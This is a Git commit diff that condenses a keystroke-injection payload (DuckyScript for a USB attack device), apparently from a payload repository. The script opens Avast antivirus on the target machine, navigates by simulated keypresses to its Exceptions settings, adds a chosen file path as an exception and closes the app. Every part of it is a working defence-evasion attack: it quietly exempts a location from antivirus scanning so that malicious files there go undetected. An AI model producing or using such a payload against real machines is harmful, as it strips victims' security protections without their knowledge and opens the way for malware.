Update payload.txt

pull/134/head
Kalani Helekunihi 2023-06-12 15:37:18 -04:00 committed by GitHub
parent 2a0abc653a
commit 120dd165a5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 49 deletions

View File

@ -16,79 +16,35 @@ REM - Avast installed and configured
REM Set the full-path that you want to set as exception
DEFINE FULL-PATH example/to/path
DEFAULT_DELAY 500
REM Open Avast application
DELAY 2000
GUI
DELAY 1000
STRING avast
DELAY 1000
ENTER
STRINGLN avast
REM Go to Avast menu
DELAY 1000
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
REPEAT 3 TAB
ENTER
REM Go to Avast settings
DELAY 1000
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
REPEAT 4 TAB
ENTER
REM Go to Exceptions menu
DELAY 1000
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
REPEAT 12 TAB
ENTER
REM Add Exception button
DELAY 500
TAB
DELAY 500
ENTER
REM Write the full-path and then close the Avast app
DELAY 1000
TAB
DELAY 500
STRING FULL-PATH
DELAY 500
TAB
DELAY 500
ENTER
DELAY 1000
ALT F4